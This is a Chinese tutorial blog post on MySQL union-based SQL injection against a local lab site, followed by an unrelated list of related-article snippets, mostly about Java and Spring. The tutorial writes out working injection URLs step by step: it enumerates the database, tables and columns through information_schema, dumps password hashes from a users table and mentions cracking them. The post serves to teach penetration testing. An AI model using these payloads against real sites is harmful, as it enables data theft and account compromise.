华丽的贵族
华丽的贵族

sql注入之联合查询(Mysql)

联合注入

联合查询union需要让前面语句报错,数字型直接加 - ,
字符型加 - 再闭合:-1’ union语句 --+

- 测试网站

phpstudy搭建的mysql网站
http://localhost/pentest/article.php?id=1
适用于Mysql网站

- 注入步骤

1.判断是否存在注入

输入and 1=1 未报错
输入and 1=2 报错
sql注入之联合查询(Mysql)_第1张图片
sql注入之联合查询(Mysql)_第2张图片

2.获取字段的总数: order by +数字

数字从1到4时4报错,所以网站字段为3
sql注入之联合查询(Mysql)_第3张图片
sql注入之联合查询(Mysql)_第4张图片
sql注入之联合查询(Mysql)_第5张图片

3.进行连接查询

http://localhost/pentest/article.php?id=-1 union select 1,2,3

//从这不开始后面都需要令id=-1让其报错

sql注入之联合查询(Mysql)_第6张图片

返回结果为2,3 说明union select 1,2,3中2,3可以输入mysql语句,尝试在2处查询数据库名( database() )

4.对数据库查询

http://localhost/pentest/article.php?id=-1 union select 1,database(),user()
只有在mysql5.0以上版本才能使用database()查询数据库
一般union select 1,database(),3 爆出数据库便可往下执行。
sql注入之联合查询(Mysql)_第7张图片
用database(),user()带入2,3或者分别带入其中某个,得到数据库的名字和用户名
sql注入之联合查询(Mysql)_第8张图片
sql注入之联合查询(Mysql)_第9张图片
图为当前网站的用户名和数据库
Mysql注入时还可以输入:
system_user() 系统用户名
user() 用户名
current_user() 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() Mysql数据库版本
@@datadir 读取数据库路径
@@basedir Mysql安装路径
@@version_compile_os 操作系统

5.对target_sys数据库的表名进行查询

语句: select table_name from information_schema.tables where table_schema = ‘target_sys’ limit 0,1

将语句加括号后代换2或3

http://localhost/pentest/article.php?id=-1 union select 1,(select table_name from information_schema.tables where table_schema = ‘target_sys’ limit 0,1),3
sql注入之联合查询(Mysql)_第10张图片这里查出的是第一个表名,可以通过修改 语句后面的limit 0,1为limit 1,1或limit 2,1查看其他表名,这里以users表为例继续

6.对user表中的字段(列名)查询

语句: select column_name from information_schema.columns where table_schema = ‘target_sys’ and table_name = ‘users’ limit 0,1

同样将语句加括号后代换2或3

http://localhost/pentest/article.php?id=-1 union select 1,2,(select column_name from information_schema.columns where table_schema = ‘target_sys’ and table_name = ‘users’ limit 0,1)
sql注入之联合查询(Mysql)_第11张图片更换limit 1,1找打其他的字段名分别为:id,username,password,email

查询账户密码内容

http://localhost/pentest/article.php?id=-1 union select 1,2,password from users
sql注入之联合查询(Mysql)_第12张图片
用MD5解密就行了,用户名同理。

对于有waf防火墙的网站期待后面的学习吧。

你可能感兴趣的:(注入)

  • 【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽黑客鹏哥 web安全CTF网络安全大赛pythonLinux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • SQL注入原理即sqli-labs搭建,sql注入简单实战 Cwillchris 网络安全全栈课程渗透测试web安全安全sql
    一、SQL注入概述1、SQL注入原理用户登录的基本SQL语句:select*fromuserswhereusername='用户输入的用户名'andpassword='用户输入的密码'用户输入的内容是可控的,例如我们可以在用户名中输入'or1=1--空格select*fromuserswhereusername=''or1=1--空格'andpassword='用户输入的密码'此时我们输入的第一个
  • Spring Boot@Component注解下的类无法@Autowired的问题 Micrle_007 springbootSpring
    这个问题心累(确实)在把我的一个非Web程序迁移从Spring迁移到SpringBoot时,出现了在@Component注解下@Autowired的类为null的情况,也就是没注入成功,或者说是此类在bean加载之前就被调用了。试了各种办法,修改扫描包,修改@Component注解等等,皆未成功,后来看到了一个方法,探究了一下。@ComponentpublicclassComponentClass
  • Spring Boot @Component注解介绍 CnLg.NJ Javaspringboot后端java
    @Component是Spring中的一个核心注解,用于声明一个类为Spring管理的组件(Bean)。它是一个通用的注解,可以用于任何层次的类(如服务层、控制器层、持久层等)。通过@Component注解,Spring会自动检测并注册该类为一个Bean,从而实现依赖注入和生命周期管理。1.@Component的作用@Component是一个元注解,它本身被@Configuration、@Serv
  • Spring--IOC控制反转与DI依赖注入的三种方式 wildyuhao Javaspringmaveniocjava
    Spring--IOC控制反转与DI依赖注入的三种方式1.setter方法注入2.构造器注入3.接口注入Spring的核心思想是IOC和AOP,IOC即控制反转,包括依赖注入和依赖查找,最主要使用的即依赖注入DI。通常情况下,我们创建对象时,是通过new关键字主动进行的;而DI则是在创建对象时,只设置配置文件,由Spring统一创建对象并调用。这也就是控制反转的由来。接下来本文将重点介绍依赖注入的
  • 深入理解 Spring IoC 与 DI:控制反转与依赖注入解析 代码江 Springspringjava后端
    前言:在接触Spring框架之前,通常我们会在main方法或其他业务逻辑中手动new对象,然后调用这些对象的方法来完成任务。手动创建对象的方式意味着我们自己掌握了对象的控制权。然而,在Spring中,我们不再直接在代码中手动创建对象,而是将对象的创建、管理、依赖注入等职责交给了Spring容器。Spring框架通过IoC(控制反转)和DI(依赖注入)来实现这一点。大家伙,这次封面是我把标题发给ai
  • Spring:核心IOC容器、DI依赖注入案例以及注入方式-List-Map注入详解(2) 九八年的尾巴 SpringFrameworkspringjavaiocbean
    什么是IOCInverseofControl(控制反转)?是一种设计思想将原本在程序中手动创建对象的流程,交由Spring框架来管理核心:以前创建对象主动权是自己把控,现在创建对象的控制权反转给Spring框架,DI依赖注入和控制反转是同一概念不同角度的描述。就是应用程序在运行时依赖IOC容器来动态注入对象需要的外部资源。对象的生命周期由Spring统一管理Spring框架核心就是容器,里面存储管
  • Spring_IoC控制反转、依赖注入详解 WziH_CSDN springjava
    Spring_IoC一、IoC相关概念简介1、理解【控制】和【依赖】的概念IoC即控制反转、依赖注入。——OOAD依赖倒置【控制】和【依赖】都代表对象之间的关联关系,而且他们在Spring中是一对近义词,控制和依赖几乎是并存的。例如,现有如下需求:汽车的功能是行驶,司机的功能是驾驶汽车,令汽车行驶。我们可以通过代码描述上述关系:publicclassCar{//汽车类privateStringna
  • Spring 学习笔记(一)Spring两大核心技术IOC控制反转/DI依赖注入和AOP面向切面 案例 | 优化传统的Web开发 | MVC架构DAO层与Service层之间的解耦 「已注销」 #SSMSpring
    文章目录参考资料运行环境一、Spring概述1.1Spring产生背景1.2两大核心技术IOC/DI+AOP二、Spring核心技术2.1IOC/DI2.1.1案例:IOC实现解耦2.1.2IOC/DI使用总结2.2AOP2.2.1案例:AOP实现日志打印2.2.2AOP使用总结:三、总结参考资料SPOC运行环境windows10IDEA2021.1专业版JDK8Spring-5.0.5一、Spr
  • 二、Spring Framework基础:IoC(控制反转)和DI(依赖注入) 伯牙碎琴 #Spring框架springlog4jjava
    SpringCore:深入理解IoC和DI原理在Java开发中,SpringFramework是一个极为重要的框架,而IoC(控制反转)和DI(依赖注入)是Spring的核心特性。它们不仅帮助开发者简化代码的复杂性,还极大地提高了代码的可维护性和可扩展性。本文将深入探讨IoC和DI的原理,并通过实际代码示例帮助你更好地理解。1.IoC(控制反转)是什么?1.1定义IoC(InversionofCo
  • Spring自己注入自己,解决异步失效问题 hxj.. Sring框架springjavaspringboot
    1.为什么会产生同一类内异步注解失效?我们要清楚,异步,事务这些注解生效的原理,在于通过切面创建了代理类,通过操作代理类我们实现了异步,事务,但是当我们在同一类内声明异步,事务时,则不会创建代理类,因此异步,事务注解失效。2.如何解决失效问题?有两种方式一、在另一个类中定义异步方法,进行调用,略。二、在同一个类中,通过自己注入自己的方式实现代理类的创建importlombok.extern.slf
  • 【Python百日进阶-Web开发-FastAPI】Day801 - FastAPI是什么 岳涛@泰山医院 Dashpython前端fastapi
    文章目录一、官网二、FastAPI是什么三、FastAPI特性3.1基于开放标准3.2自动生成文档3.3更主流的Python3.4编辑器支持3.5简洁3.6验证3.7安全性及身份验证¶3.8依赖注入3.9无限制"插件"3.10测试四、Starlette特性五、Pydantic特性六、Python类型提示简介6.1动机6.1.1简单示例6.1.2修改示例6.1.3添加类型6.2更多动机6.3声明类型
  • Spring Boot中的事务管理 Java墨言 程序员springboot服务器后端
    快速入门在SpringBoot中,当我们使用了spring-boot-starter-jdbc或spring-boot-starter-data-jpa依赖的时候,框架会自动默认分别注入DataSourceTransactionManager或JpaTransactionManager。所以我们不需要任何额外配置就可以用@Transactional注解进行事务的使用。我们以之前实现的《用sprin
  • sql注入总结(时间盲注,布尔盲注,无列名注入,regexp盲注,order by注入,二次注入,update注入,报错注入) 尘佑不尘 sql数据库web安全网络安全笔记学习
    一、update注入query="updatemembersetsex=′query="updatemembersetsex='query="updatemembersetsex=′sex’,phonenum=‘phonenum′,address=′phonenum',address='phonenum′,address=′add,email=‘emailwhereusername=’$ueser
  • 半导体晶圆精控:ethercat转profient网关数据提升制造精度 北京耐用通信 制造网络ethercatethercat总线
    数据采集系统通过网关连接离子注入机,精细控制半导体晶圆制造过程中的关键参数。在半导体制造中,晶圆制造设备的精密控制是决定产品性能的关键因素。某半导体工厂采用耐达讯Profinet转EtherCAT协议网关NY-PN-ECATM,将其数据采集系统与离子注入机连接,实现了晶圆制造过程的精细控制与高效管理。Profinet网络负责传输数据采集系统中的各类监测数据,如温度、压力和电流等参数。这些数据通过网
  • 【基于PHP的CMS动态网站的渗透测试流程】 D-river securityphp开发语言网络安全安全web安全
    基于PHP的CMS动态网站的渗透测试流程一、渗透测试流程优化1.智能信息收集阶段2.靶向漏洞扫描3.深度手动测试二、关键风险检测清单1.PHP环境风险2.数据库交互风险3.会话管理缺陷三、高效测试方法论1.自动化辅助技术2.逻辑漏洞快速定位3.WAF绕过技术四、企业级防护建议1.环境加固2.监控与响应五、典型漏洞验证(PHP对象注入)附:工具链推荐安全测试对网站意义重大,它能够提前发现网站在网络、
  • 企业级Java开发整理的常用注解汇总 小鱼ccd java开发语言
    一、SpringBoot核心注解1.启动与配置注解说明示例代码@SpringBootApplication主启动类注解(组合注解)@SpringBootApplicationpublicclassApp{...}@Configuration声明配置类@ConfigurationpublicclassAppConfig{...}@Bean将方法返回对象注入容器@BeanpublicDataSourc
  • 使用NestJS的控制器与业务逻辑结合的入门教程 XymkMl JavaScript
    NestJS是一个用于构建高效、可扩展的Node.js应用程序的框架。它采用了现代化的JavaScript或TypeScript语言,并提供了强大的依赖注入、模块化和面向切面编程等功能。本教程将介绍如何在NestJS应用程序中结合控制器和业务逻辑,以实现灵活且可维护的代码结构。步骤1:创建NestJS应用程序首先,我们需要安装NestJSCLI工具,用于创建和管理NestJS应用程序。打开终端并执
  • SQL注入(一)—— sql手动注入实操 逆熵SEC. sql网络web安全
    SQLSQL注入sql注入的核心SQL手注的一般流程判断注入点——第一步判断字段数——第二步判断回显点——第三步查询相关内容——第四步判断库名判断表名判断列名查询具体信息总结SQL注入SQL注入攻击是目前web应用网络攻击中最常见的手段之一,曾被冠以“漏洞之王”的称号,其安全风险高于缓冲区溢出漏洞等所有其他漏洞,而市场上的防火墙又不能对SQL注入漏洞进行有效的检测和防范。SQL注入攻击普遍存在范围
  • 新一年,从这 5 个方面让网站 “脱胎换骨” 网站优化seo网站搭建
    新年伊始,万象更新。在这个充满希望的时刻,人们往往会制定新计划,为生活注入新活力。而新的一年,不仅是个人生活革新的契机,更是企业与机构审视自身网站,进行优化与升级的黄金时期。若你的网站已许久未清理和更新,当下正是最佳时机。以下为大家详细阐述在新的一年中,值得重点关注和优化的五大方面。一、提升网站响应速度网站的加载速度是用户体验的关键指标。在信息爆炸的时代,用户期望能够迅速、便捷地获取所需内容。若网
  • WordPress Course Booking System SQL注入漏洞复现 (CVE-2025-22785)(附脚本) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:课程预订系统是一个在线平台,旨在简化课程报名流程。用户可以通过系统浏览可用课程,查看详细的课程描述、时间安排和讲师信息,并通过简单的
  • AI取代的不是人类,而是不会使用AI的人 xiaocang668888 人工智能
    面对人工智能对职场的深度渗透,职场人需从技能升级、能力重构、思维转型三个维度构建核心竞争力。以下是具体策略:一、技能升级:掌握AI协同工具AI工具链学习掌握主流AI工具(如Claude、Midjourney)的操作逻辑,将重复性工作(数据分析、文档处理)交由AI完成,释放时间用于高阶任务。例如,市场营销人员用AI生成广告初稿后,再注入人性化洞察。技术门槛公式:CAI=任务重复度工具掌握度×业务理解
  • 2025年CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽安全-黑客4148 网络安全web安全linux密码学CTF
    目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15天)4.3、后期五、CTF学习资源5.1、CTF赛题复现平台5.
  • [特殊字符]️ ‌Selenium元素存在性判断的5种方法‌ test猿 seleniumpython测试工具
    ️‌Selenium元素存在性判断的5种方法‌方法对比表方法类型执行效率异常处理适用场景推荐指数显式等待法⭐⭐⭐⭐自动处理动态加载元素⭐⭐⭐⭐⭐批量查找法⭐⭐⭐⭐无需捕获简单静态页面⭐⭐⭐⭐异常捕获法⭐⭐手动处理兼容旧代码⭐⭐JavaScript注入法⭐⭐⭐⭐无需捕获需绕过DOM检查⭐⭐⭐复合条件法⭐⭐⭐⭐自动处理复杂异步场景⭐⭐⭐⭐‌核心解决方案‌1️⃣‌显式等待法(推荐首选)‌fromsele
  • 策略模式结合springboot开发 别告诉我有BUG 设计模式java设计模式
    策略模式介绍策略模式是什么?策略模式是依赖接口多实现的一种设计模式,通一接口的方法通过不同的实现方式呈现接口的多态。策略模式中上下文对象,上下文对象封装了接口的具体实现,与一些逻辑,是提供服务与实际的服务底层逻辑相互分离。结合springboot实现策略模式1、创建公共接口类2、构建类去实现这个公共接口,实现类可以有多个3、构建上下文对象类,去封装实现的逻辑(可以通过注入的方式创建接口实现类)4、
  • Spring注解格式化与数据绑定的实战应用 t0_54manong springjavaservlet个人开发
    在Spring框架中,注解不仅用于声明依赖注入和事务管理,还可以用于定义数据格式化规则。Spring提供了org.springframework.format.annotation包中的注解,以及AnnotationFormatterFactory接口,用于将注解与格式化器绑定。通过这种方式,我们可以非常方便地对数据进行格式化处理。本文将通过一个实例,展示如何使用Spring的注解格式化功能以及如
  • 【网络安全】PHP常见漏洞分析 网络安全-杰克 web安全php安全
    0x01sql注入漏洞sql注入漏洞,只要是一个懂编程的基本都听说过的,即便你不太了解网络安全,这个漏洞也被大家广泛的知道了,因为它的危害性和影响的深远性。sql注入可以按照接收的元素分为数字型注入和字符型注入。按照注入的语法,可以分为联合注入,布尔注入,延时注入,报错注入,等等。。。也有很多高阶的玩法,主要看编程的功力0x02xss漏洞xss漏洞刚开始很多网站管理员并不太关注,后来随着xss技术
  • Java面试题总结之Spring高频面试题 程恤 javaspring面试
    一、题目:谈谈你对Spring框架的理解1.Spring是一个开源框架,主要是为简化企业级应用可开发而生,可以实现EJB可以实现的功能,Spring是一个IOC和AOP容器框架。①控制反转(IOC):Spring容器使用了工厂模式为我们创建了所需要的对象,我们使用时不需要自己去创建,直接调用Spring为我们提供的对象即可,这就是控制反转的思想②依赖注入(DI):Spring使用JavaBean对
  • 如何用Java校验SQL语句的合法性 master_chenchengg 能力提升面试宝典技术IT信息化
    如何用Java校验SQL语句的合法性SQL语句基础与常见错误类型使用Java解析SQL语句的基本方法通过JDBC执行预编译语句验证SQL合法性应用第三方库如JSqlParser进行SQL语法检查实现自定义SQL校验规则以增强安全性处理动态SQL生成及校验的挑战与解决方案在Java应用中集成SQL校验的最佳实践探讨SQL注入防护策略与Java中的实现方式SQL语句基础与常见错误类型在讨论如何使用Ja
  • 解锁健康密码,拥抱养生生活 lanlande33 生活
    在快节奏的现代生活中,健康养生愈发成为人们追求美好生活的关键。步入2025年,让我们从日常细节入手,开启一场充满活力的健康养生之旅。饮食是养生的基石。一日三餐,合理搭配最为重要。多吃谷物杂粮,它们富含膳食纤维与多种营养,为身体注入源源不断的能量。新鲜蔬果是餐桌上的常客,色彩斑斓的蔬菜和水果,蕴含丰富的维生素、矿物质和抗氧化物质,既能增强免疫力,又能抵御岁月痕迹。在新年聚餐时,适当减少高油高盐食物的
  • java线程的无限循环和退出 3213213333332132 java
    最近想写一个游戏,然后碰到有关线程的问题,网上查了好多资料都没满足。 突然想起了前段时间看的有关线程的视频,于是信手拈来写了一个线程的代码片段。 希望帮助刚学java线程的童鞋 package thread; import java.text.SimpleDateFormat; import java.util.Calendar; import java.util.Date
  • tomcat 容器 BlueSkator tomcatWebservlet
    Tomcat的组成部分 1、server A Server element represents the entire Catalina servlet container. (Singleton) 2、service service包括多个connector以及一个engine,其职责为处理由connector获得的客户请求。   3、connector 一个connector
  • php递归,静态变量,匿名函数使用 dcj3sjt126com PHP递归函数匿名函数静态变量引用传参
      <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Current To-Do List</title> </head> <body>
  • 属性颜色字体变化 周华华 JavaScript
    function changSize(className){ var diva=byId("fot") diva.className=className; } </script> <style type="text/css"> .max{ background: #900; color:#039;
  • 将properties内容放置到map中 g21121 properties
    代码比较简单: private static Map<Object, Object> map; private static Properties p; static { //读取properties文件 InputStream is = XXX.class.getClassLoader().getResourceAsStream("xxx.properti
  • [简单]拼接字符串 53873039oycg 字符串
             工作中遇到需要从Map里面取值拼接字符串的情况,自己写了个,不是很好,欢迎提出更优雅的写法,代码如下:           import java.util.HashMap; import java.uti
  • Struts2学习 云端月影
    最近开始关注struts2的新特性,从这个版本开始,Struts开始使用convention-plugin代替codebehind-plugin来实现struts的零配置。 配置文件精简了,的确是简便了开发过程,但是,我们熟悉的配置突然disappear了,真是一下很不适应。跟着潮流走吧,看看该怎样来搞定convention-plugin。 使用Convention插件,你需要将其JAR文件放
  • Java新手入门的30个基本概念二 aijuans java新手java 入门
    基本概念:  1.OOP中唯一关系的是对象的接口是什么,就像计算机的销售商她不管电源内部结构是怎样的,他只关系能否给你提供电就行了,也就是只要知道can or not而不是how and why.所有的程序是由一定的属性和行为对象组成的,不同的对象的访问通过函数调用来完成,对象间所有的交流都是通过方法调用,通过对封装对象数据,很大限度上提高复用率。  2.OOP中最重要的思想是类,类是模板是蓝图,
  • jedis 简单使用 antlove javarediscachecommandjedis
    jedis.RedisOperationCollection.java package jedis; import org.apache.log4j.Logger; import redis.clients.jedis.Jedis; import java.util.List; import java.util.Map; import java.util.Set; pub
  • PL/SQL的函数和包体的基础 百合不是茶 PL/SQL编程函数包体显示包的具体数据
    由于明天举要上课,所以刚刚将代码敲了一遍PL/SQL的函数和包体的实现(单例模式过几天好好的总结下再发出来);以便明天能更好的学习PL/SQL的循环,今天太累了,所以早点睡觉,明天继续PL/SQL总有一天我会将你永远的记载在心里,,,   函数; 函数:PL/SQL中的函数相当于java中的方法;函数有返回值 定义函数的 --输入姓名找到该姓名的年薪 create or re
  • Mockito(二)--实例篇 bijian1013 持续集成mockito单元测试
            学习了基本知识后,就可以实战了,Mockito的实际使用还是比较麻烦的。因为在实际使用中,最常遇到的就是需要模拟第三方类库的行为。         比如现在有一个类FTPFileTransfer,实现了向FTP传输文件的功能。这个类中使用了a
  • 精通Oracle10编程SQL(7)编写控制结构 bijian1013 oracle数据库plsql
    /* *编写控制结构 */ --条件分支语句 --简单条件判断 DECLARE v_sal NUMBER(6,2); BEGIN select sal into v_sal from emp where lower(ename)=lower('&name'); if v_sal<2000 then update emp set
  • 【Log4j二】Log4j属性文件配置详解 bit1129 log4j
    如下是一个log4j.properties的配置   log4j.rootCategory=INFO, stdout , R log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.layout=org.apache.log4j.PatternLayout log4j.appe
  • java集合排序笔记 白糖_ java
    public class CollectionDemo implements Serializable,Comparable<CollectionDemo>{ private static final long serialVersionUID = -2958090810811192128L; private int id; private String nam
  • java导致linux负载过高的定位方法 ronin47
    定位java进程ID 可以使用top或ps -ef |grep java ![图片描述][1] 根据进程ID找到最消耗资源的java pid 比如第一步找到的进程ID为5431 执行 top -p 5431 -H ![图片描述][2] 打印java栈信息 $ jstack -l 5431 > 5431.log 在栈信息中定位具体问题 将消耗资源的Java PID转
  • 给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数 bylijinnan 函数
    import java.util.ArrayList; import java.util.List; import java.util.Random; public class RandNFromRand5 { /** 题目:给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数。 解法1: f(k) = (x0-1)*5^0+(x1-
  • PL/SQL Developer保存布局 Kai_Ge
          近日由于项目需要,数据库从DB2迁移到ORCAL,因此数据库连接客户端选择了PL/SQL Developer。由于软件运用不熟悉,造成了很多麻烦,最主要的就是进入后,左边列表有很多选项,自己删除了一些选项卡,布局很满意了,下次进入后又恢复了以前的布局,很是苦恼。在众多PL/SQL Developer使用技巧中找到如下这段:   &n
  • [未来战士计划]超能查派[剧透,慎入] comsci 计划
           非常好看,超能查派,这部电影......为我们这些热爱人工智能的工程技术人员提供一些参考意见和思想........        虽然电影里面的人物形象不是非常的可爱....但是非常的贴近现实生活....    &nbs
  • Google Map API V2 dai_lm google map
    以后如果要开发包含google map的程序就更麻烦咯 http://www.cnblogs.com/mengdd/archive/2013/01/01/2841390.html 找到篇不错的文章,大家可以参考一下 http://blog.sina.com.cn/s/blog_c2839d410101jahv.html 1. 创建Android工程 由于v2的key需要G
  • java数据计算层的几种解决方法2 datamachine javasql集算器
    2、SQL     SQL/SP/JDBC在这里属于一类,这是老牌的数据计算层,性能和灵活性是它的优势。但随着新情况的不断出现,单纯用SQL已经难以满足需求,比如: JAVA开发规模的扩大,数据量的剧增,复杂计算问题的涌现。虽然SQL得高分的指标不多,但都是权重最高的。     成熟度:5星。最成熟的。   
  • Linux下Telnet的安装与运行 dcj3sjt126com linuxtelnet
    Linux下Telnet的安装与运行   linux默认是使用SSH服务的 而不安装telnet服务  如果要使用telnet 就必须先安装相应的软件包  即使安装了软件包 默认的设置telnet 服务也是不运行的 需要手工进行设置 如果是redhat9,则在第三张光盘中找到 telnet-server-0.17-25.i386.rpm
  • PHP中钩子函数的实现与认识 dcj3sjt126com PHP
    假如有这么一段程序: function fun(){ fun1(); fun2(); }   首先程序执行完fun1()之后执行fun2()然后fun()结束。   但是,假如我们想对函数做一些变化。比如说,fun是一个解析函数,我们希望后期可以提供丰富的解析函数,而究竟用哪个函数解析,我们希望在配置文件中配置。这个时候就可以发挥钩子的力量了。   我们可以在fu
  • EOS中的WorkSpace密码修改 蕃薯耀 修改WorkSpace密码
    EOS中BPS的WorkSpace密码修改 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 201
  • SpringMVC4零配置--SpringSecurity相关配置【SpringSecurityConfig】 hanqunfeng SpringSecurity
     SpringSecurity的配置相对来说有些复杂,如果是完整的bean配置,则需要配置大量的bean,所以xml配置时使用了命名空间来简化配置,同样,spring为我们提供了一个抽象类WebSecurityConfigurerAdapter和一个注解@EnableWebMvcSecurity,达到同样减少bean配置的目的,如下:   applicationContex
  • ie 9 kendo ui中ajax跨域的问题 jackyrong AJAX跨域
    这两天遇到个问题,kendo ui的datagrid,根据json去读取数据,然后前端通过kendo ui的datagrid去渲染,但很奇怪的是,在ie 10,ie 11,chrome,firefox等浏览器中,同样的程序, 浏览起来是没问题的,但把应用放到公网上的一台服务器, 却发现如下情况: 1) ie 9下,不能出现任何数据,但用IE 9浏览器浏览本机的应用,却没任何问题
  • 不要让别人笑你不能成为程序员 lampcy 编程程序员
    在经历六个月的编程集训之后,我刚刚完成了我的第一次一对一的编码评估。但是事情并没有如我所想的那般顺利。 说实话,我感觉我的脑细胞像被轰炸过一样。 手慢慢地离开键盘,心里很压抑。不禁默默祈祷:一切都会进展顺利的,对吧?至少有些地方我的回答应该是没有遗漏的,是不是? 难道我选择编程真的是一个巨大的错误吗——我真的永远也成不了程序员吗? 我需要一点点安慰。在自我怀疑,不安全感和脆弱等等像龙卷风一
  • 马皇后的贤德 nannan408
       马皇后不怕朱元璋的坏脾气,并敢理直气壮地吹耳边风。众所周知,朱元璋不喜欢女人干政,他认为“后妃虽母仪天下,然不可使干政事”,因为“宠之太过,则骄恣犯分,上下失序”,因此还特地命人纂述《女诫》,以示警诫。但马皇后是个例外。   有一次,马皇后问朱元璋道:“如今天下老百姓安居乐业了吗?”朱元璋不高兴地回答:“这不是你应该问的。”马皇后振振有词地回敬道:“陛下是天下之父,
  • 选择某个属性值最大的那条记录(不仅仅包含指定属性,而是想要什么属性都可以) Rainbow702 sqlgroup by最大值max最大的那条记录
    好久好久不写SQL了,技能退化严重啊!!!   直入主题: 比如我有一张表,file_info, 它有两个属性(但实际不只,我这里只是作说明用): file_code, file_version 同一个code可能对应多个version 现在,我想针对每一个code,取得它相关的记录中,version 值 最大的那条记录, SQL如下: select *
  • VBScript脚本语言 tntxia VBScript
      VBScript 是基于VB的脚本语言。主要用于Asp和Excel的编程。   VB家族语言简介   Visual Basic 6.0           源于BASIC语言。           由微软公司开发的包含协助开发环境的事
  • java中枚举类型的使用 xiao1zhao2 javaenum枚举1.5新特性
    枚举类型是j2se在1.5引入的新的类型,通过关键字enum来定义,常用来存储一些常量.   1.定义一个简单的枚举类型 public enum Sex { MAN, WOMAN }   枚举类型本质是类,编译此段代码会生成.class文件.通过Sex.MAN来访问Sex中的成员,其返回值是Sex类型.   2.常用方法 静态的values()方
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他